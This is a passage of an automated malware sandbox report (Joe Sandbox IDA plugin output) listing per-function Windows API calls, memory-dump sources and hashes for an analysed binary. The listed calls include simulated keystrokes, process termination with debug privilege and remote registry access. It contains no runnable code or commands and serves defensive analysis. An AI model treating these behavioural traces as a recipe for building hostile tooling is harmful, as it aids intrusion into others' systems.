                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B6C638
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B6C65A
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B6C672
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B6C690
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B6C6B1
                                              • DestroyIcon.USER32(00000000), ref: 00B6C6C0
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B6C6DD
                                              • DestroyIcon.USER32(?), ref: 00B6C6EC
                                                • Part of subcall function 00BBAAD4: DeleteObject.GDI32(00000000), ref: 00BBAB0D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2819616528-0
                                              • Opcode ID: 37ef8115054d2905b1873c8b97c45e7854be9475edcc72e5dbae0477d8f54cdd
                                              • Instruction ID: e47f0a2157c8d2b9ff8adb3a708a6f44280874dfe9b8d047c20d4fc98bbc59ea
                                              • Opcode Fuzzy Hash: 37ef8115054d2905b1873c8b97c45e7854be9475edcc72e5dbae0477d8f54cdd
                                              • Instruction Fuzzy Hash: 41517970610209EFDB24DF24CC85FBA7BF5EB48710F2046A8F94697290DB70AD90DB60
                                              Function 00B8A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B8B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8B54D
                                                • Part of subcall function 00B8B52D: GetCurrentThreadId.KERNEL32 ref: 00B8B554
                                                • Part of subcall function 00B8B52D: AttachThreadInput.USER32(00000000,?,00B8A23B,?,00000001), ref: 00B8B55B
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A246
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B8A263
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00B8A266
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A26F
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B8A28D
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B8A290
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A299
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B8A2B0
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B8A2B3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 57fd3c79d161a3d2c45f53a9b46ff8b32a04a91786367425f5ad85e81875fa5b
                                              • Instruction ID: 2800b97613261de30af03aa475c0a83a48c372ec2121603aa2c4f86005c3ef4a
                                              • Opcode Fuzzy Hash: 57fd3c79d161a3d2c45f53a9b46ff8b32a04a91786367425f5ad85e81875fa5b
                                              • Instruction Fuzzy Hash: 3411CEB1960218FEF6207F649C8AF6A7A6DEB4C750F110419F3506B0A0CEF36C50DBA0
                                              Function 00B894D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B8915A,00000B00,?,?), ref: 00B894E2
                                              • HeapAlloc.KERNEL32(00000000,?,00B8915A,00000B00,?,?), ref: 00B894E9
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B8915A,00000B00,?,?), ref: 00B894FE
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00B8915A,00000B00,?,?), ref: 00B89506
                                              • DuplicateHandle.KERNEL32(00000000,?,00B8915A,00000B00,?,?), ref: 00B89509
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B8915A,00000B00,?,?), ref: 00B89519
                                              • GetCurrentProcess.KERNEL32(00B8915A,00000000,?,00B8915A,00000B00,?,?), ref: 00B89521
                                              • DuplicateHandle.KERNEL32(00000000,?,00B8915A,00000B00,?,?), ref: 00B89524
                                              • CreateThread.KERNEL32(00000000,00000000,00B8954A,00000000,00000000,00000000), ref: 00B8953E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 2bd485992641e802c49164ec91b77f6621d7528baec2c61354aa6883ef97d8d0
                                              • Instruction ID: d4408d103a1e5fe9e783965e480654b8fdac453528706e0414e1204695f28b39
                                              • Opcode Fuzzy Hash: 2bd485992641e802c49164ec91b77f6621d7528baec2c61354aa6883ef97d8d0
                                              • Instruction Fuzzy Hash: BC01BBB5250304FFE710ABA5DC4DF6B7BACEB89711F044411FA05DB1A1CA709800CB20
                                              Function 00BAA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: 542170597cdf49c2066b360e39655d08d5e136e132c3b9a516a74195ccc28cf8
                                              • Instruction ID: 0404943c96d00a523095ac2ba6c10ccc1056a147c248b6fac57a17134519410d
                                              • Opcode Fuzzy Hash: 542170597cdf49c2066b360e39655d08d5e136e132c3b9a516a74195ccc28cf8
                                              • Instruction Fuzzy Hash: AEC19171E0421A9FDF14DFA8C884BAEB7F5FB59314F1484A9E905AB280E770ED44CB61
                                              Function 00BA97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: 8332d102431291191d1d93fb118c113fe02f615ef105278082e885507df3e363
                                              • Instruction ID: 6b3d1100a7d1fb5fe199e9e6d99ff051b83f6a8157869e1564325dd58b9551ef
                                              • Opcode Fuzzy Hash: 8332d102431291191d1d93fb118c113fe02f615ef105278082e885507df3e363
                                              • Instruction Fuzzy Hash: D0918B31A04219ABDF24CFA5C884FAFBBF8EF46710F10859EE515AB290D7709944DBA0
                                              Function 00BA9E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B87D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?,?,00B88073), ref: 00B87D45
                                                • Part of subcall function 00B87D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D60
                                                • Part of subcall function 00B87D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D6E
                                                • Part of subcall function 00B87D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?), ref: 00B87D7E
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BA9EF0
                                              • _memset.LIBCMT ref: 00BA9EFD
                                              • _memset.LIBCMT ref: 00BAA040
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00BAA06C
                                              • CoTaskMemFree.OLE32(?), ref: 00BAA077
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00BAA0C5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: 5713daa3a080d017246b1bc10da91df057863959748c17cdfc19d760732e5258
                                              • Instruction ID: 4ead7414fbf5cfc8afb0748c1bc36b7a989db2f5463b032e8819e112999b6602
                                              • Opcode Fuzzy Hash: 5713daa3a080d017246b1bc10da91df057863959748c17cdfc19d760732e5258
                                              • Instruction Fuzzy Hash: 47911671D00229EBDB20DFA4DC81EDEBBB9EF09310F10819AF515A7291DB719A44DFA1
                                              Function 00BB73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BB7449
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BB745D
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BB7477
                                              • _wcscat.LIBCMT ref: 00BB74D2
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BB74E9
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BB7517
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              • Opcode ID: 99955bd61c00c08318cd715f4ac136a1a2bcc521801c3491fbe9bf874a8a5e3f
                                              • Instruction ID: fd72c0b4544cad319eeba56dfb53d3a31ba3fdd29276aefd6efc0e4a0dbe4c71
                                              • Opcode Fuzzy Hash: 99955bd61c00c08318cd715f4ac136a1a2bcc521801c3491fbe9bf874a8a5e3f
                                              • Instruction Fuzzy Hash: E441C470544348AFDB219F64CC85FEE7BE8EF48350F1044AAF945A7291DBB19D84CB60
                                              Function 00BAF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B94148: CreateToolhelp32Snapshot.KERNEL32 ref: 00B9416D
                                                • Part of subcall function 00B94148: Process32FirstW.KERNEL32(00000000,?), ref: 00B9417B
                                                • Part of subcall function 00B94148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B94245
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAF08D
                                              • GetLastError.KERNEL32 ref: 00BAF0A0
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAF0CF
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BAF14C
                                              • GetLastError.KERNEL32(00000000), ref: 00BAF157
                                              • CloseHandle.KERNEL32(00000000), ref: 00BAF18C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 1701285019-2896544425
                                              • Opcode ID: 7f0c16574dd6dbf3c745b4e0d7ddaf2959caec7a8bbac4571cd9cf20575a8bdb
                                              • Instruction ID: fbcb1332a0b54566329aa6bb27a8abc04d488f5a792585cc14f1a3afde594c29
                                              • Opcode Fuzzy Hash: 7f0c16574dd6dbf3c745b4e0d7ddaf2959caec7a8bbac4571cd9cf20575a8bdb
                                              • Instruction Fuzzy Hash: 6741C030204202DFDB11EF64CC95FBEB7E1AF84714F1484A9F8026B292CB74AD05CB85
                                              Function 00B934DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00B9357C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 775fc4d24c544011ab2602447ecee63b6a463279ee9ea70ad67341c082259cd3
                                              • Instruction ID: 86c4e239570080500a6893fb92f3ee2a863fc8ae8de8bcde2fdc7bb75992d791
                                              • Opcode Fuzzy Hash: 775fc4d24c544011ab2602447ecee63b6a463279ee9ea70ad67341c082259cd3
                                              • Instruction Fuzzy Hash: 9E110571608746BAEF045B25DCD2D6A77DCDF2DBA0B2100FAFA00B6281E764AF4046A1
                                              Function 00B947E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B94802
                                              • LoadStringW.USER32(00000000), ref: 00B94809
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B9481F
                                              • LoadStringW.USER32(00000000), ref: 00B94826
                                              • _wprintf.LIBCMT ref: 00B9484C
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B9486A
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00B94847
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 4c32b7a4d4960dad88584b4fa6ab18f45ed797fe1a2f868f3abf2518d4a3b3f3
                                              • Instruction ID: b7aca16628dd31622de82ffda0403878c1d83b54bdc99f02494c7dd10517a5c6
                                              • Opcode Fuzzy Hash: 4c32b7a4d4960dad88584b4fa6ab18f45ed797fe1a2f868f3abf2518d4a3b3f3
                                              • Instruction Fuzzy Hash: 290162F2910248BFEB11ABA49D89FF673ACE708301F4005E5BB49E3141EB749E844B75
                                              Function 00BBDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BBDB42
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BBDB62
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BBDD9D
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BBDDBB
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BBDDDC
                                              • ShowWindow.USER32(00000003,00000000), ref: 00BBDDFB
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BBDE20
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BBDE43
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-0
                                              • Opcode ID: 4ff98a8a249d17214f2a335d1d3058e16eab832d3052a5d8afac23c116066156
                                              • Instruction ID: 69ba9067702fc808716e3a207ece98ebdd36d410a686819f44b23a72a802f108
                                              • Opcode Fuzzy Hash: 4ff98a8a249d17214f2a335d1d3058e16eab832d3052a5d8afac23c116066156
                                              • Instruction Fuzzy Hash: 27B15871600215AFDF14CF69C985BF97BF1FB48701F0881A9EC489F295EBB9A950CB90
                                              Function 00BB0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB044E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3479070676-0
                                              • Opcode ID: f1ad91414b3939c7adf532bbfabdf748a9cc22c3922d82da78eebfd27791e50d
                                              • Instruction ID: cb35cfc1cb0f5610c515b67b241439c0c3b1a69048319ddeff058dc3c1a23bc3
                                              • Opcode Fuzzy Hash: f1ad91414b3939c7adf532bbfabdf748a9cc22c3922d82da78eebfd27791e50d
                                              • Instruction Fuzzy Hash: B0A176302042059FCB10EF24C885FBEBBE4EF84314F14899CF5969B2A2DB75E945CB42
                                              Function 00B32E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000), ref: 00B32E9F
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000,000000FF), ref: 00B32EE7
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000), ref: 00B6C55B
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000), ref: 00B6C5C7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: da065a035b07706b9be0adc864a1aac9904ae9ccc46c4dbf2871d43d77fda6f9
                                              • Instruction ID: 7b42c2c93c10f2e97737037b439371c5fa6647a30e49ae99c8ef797f74375570
                                              • Opcode Fuzzy Hash: da065a035b07706b9be0adc864a1aac9904ae9ccc46c4dbf2871d43d77fda6f9
                                              • Instruction Fuzzy Hash: F841C435618690AAC7399B29CCCAB7A7FD2EB95300F3484DEE48B47661CF75A940DB10
                                              Function 00B97681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B97698
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B976CF
                                              • EnterCriticalSection.KERNEL32(?), ref: 00B976EB
                                              • _memmove.LIBCMT ref: 00B97739
                                              • _memmove.LIBCMT ref: 00B97756
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00B97765
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B9777A
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B97799
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
